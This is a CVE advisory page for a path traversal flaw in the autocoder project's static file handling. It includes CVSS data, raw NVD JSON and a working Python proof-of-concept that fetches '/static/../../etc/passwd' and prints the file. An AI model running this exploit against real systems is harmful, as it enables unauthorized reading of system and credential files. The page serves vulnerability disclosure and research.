Security Vulnerability Report
CVE-2026-30351 CVSS 7.5 HIGH

CVE-2026-30351

Published: 2026-04-27 16:16:43
Last Modified: 2026-04-27 19:18:47

Description

A path traversal vulnerability in the UI/static component of leonvanzyl autocoder commit 79d02a allows attackers to read arbitrary files by sending a crafted URL path containing traversal sequences.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

leonvanzyl autocoder commit 79d02a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests


def exploit_poc(target_url):
    # The vulnerable endpoint is in the UI/static component
    # Using '../' to traverse out of the web root
    payload = "/static/../../etc/passwd"
    full_url = f"{target_url}{payload}"

    try:
        response = requests.get(full_url, timeout=10)

        # Check if the response indicates successful file read
        if response.status_code == 200 and "root:" in response.text:
            print("[+] Vulnerability Exploited Successfully!")
            print("[+] File Content:")
            print(response.text)
        else:
            print("[-] Exploit failed or target not vulnerable.")
            print(f"Status Code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")


if __name__ == "__main__":
    target = "http://127.0.0.1:8000"  # Replace with actual target
    exploit_poc(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30351", "sourceIdentifier": "[email protected]", "published": "2026-04-27T16:16:43.413", "lastModified": "2026-04-27T19:18:46.690", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A path traversal vulnerability in the UI/static component of leonvanzyl autocoder commit 79d02a allows attackers to read arbitrary files via sending crafted URL path containing traversal sequences."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://gist.github.com/syphonetic/0201da0fda7f700e0701d82d755d78a0", "source": "[email protected]"}, {"url": "https://github.com/leonvanzyl/autocoder", "source": "[email protected]"}]}}